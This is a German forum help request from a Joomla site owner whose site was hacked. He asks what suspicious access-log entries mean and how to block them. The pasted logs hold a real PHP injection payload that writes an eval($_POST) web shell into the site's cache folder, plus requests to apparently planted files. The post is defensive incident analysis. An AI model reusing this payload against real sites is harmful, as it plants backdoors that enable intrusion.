Hallo,
leider wurde unsere joomla Seite letztens gehackt, zum Glück hatten wir DB- und Dateibackups, so dass der Vorzustand wieder hergestellt ist.
Um ein erneutes Hacken zu verhindern, suche ich jetzt den Weg, den der Einbrecher gegangen ist, dabei sind mir die Zeilen unten aufgefallen.
Kann mir jemand sagen, was dieser Aufruf "GET //?1=@ini_set(%22display_errors" im web.log? bedeutet und wie man so etwas verhindern kann?
(Vermutlich per .htaccess, aber was macht dieser Aufruf?)
Die Templatepositionen /?tp habe ich bereits deaktiviert und bin jetzt dabei weitere Tipps von joomla-security umzusetzen.
Ja, der Zugriff auf /administrator ist inzwischen auch per .htaccess blockiert.
Weitere nette log-Zeilen:
Code
62.210.88.198 - - [03/Jan/2017:23:22:59 +0100] "GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo '-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php eval($_POST%5B1%5D);?%3E');echo '%7C%3C-'; HTTP/1.1" 200 39823 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
62.210.88.198 - - [03/Jan/2017:23:23:00 +0100] "GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo '-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php eval($_POST%5Bshine%5D);?%3E');echo '%7C%3C-'; HTTP/1.1" 200 39823 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
62.210.88.198 - - [03/Jan/2017:23:23:06 +0100] "POST /administrator/index.php HTTP/1.1" 303 - "http://www.xxxx.de" "-"
35.166.247.183 - - [03/Jan/2017:18:53:42 +0100] "POST /admin/Cms_Wysiwyg/directive/index/ HTTP/1.1" 404 1572 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
107.151.137.246 - - [07/Jan/2017:02:59:38 +0100] "POST /modules/mod_articles_tags/mod_articles_tags.php?login=uxgax HTTP/1.1" 200 16 "http://www.xxxx.de/modules/mod_articles_tags/mod_articles_tags.php?login=uxgax" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537 (KHTML, like Gecko)"
192.200.212.204 - - [07/Jan/2017:03:58:50 +0100] "POST /modules/mod_articles_tags/mod_articles_tags.php?login=uxgax HTTP/1.1" 200 12 "-" "-"
107.151.137.246 - - [07/Jan/2017:02:59:38 +0100] "POST /modules/mod_articles_tags/mod_articles_tags.php?login=uxgax HTTP/1.1" 200 16 "http://www.xxxx.de/modules/mod_articles_tags/mod_articles_tags.php?login=uxgax" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537 (KHTML, like Gecko)"
192.200.212.204 - - [07/Jan/2017:03:58:50 +0100] "POST /modules/mod_articles_tags/mod_articles_tags.php?login=uxgax HTTP/1.1" 200 12 "-" "-"
Vielen Dank
Uwe
joomla 3.6.5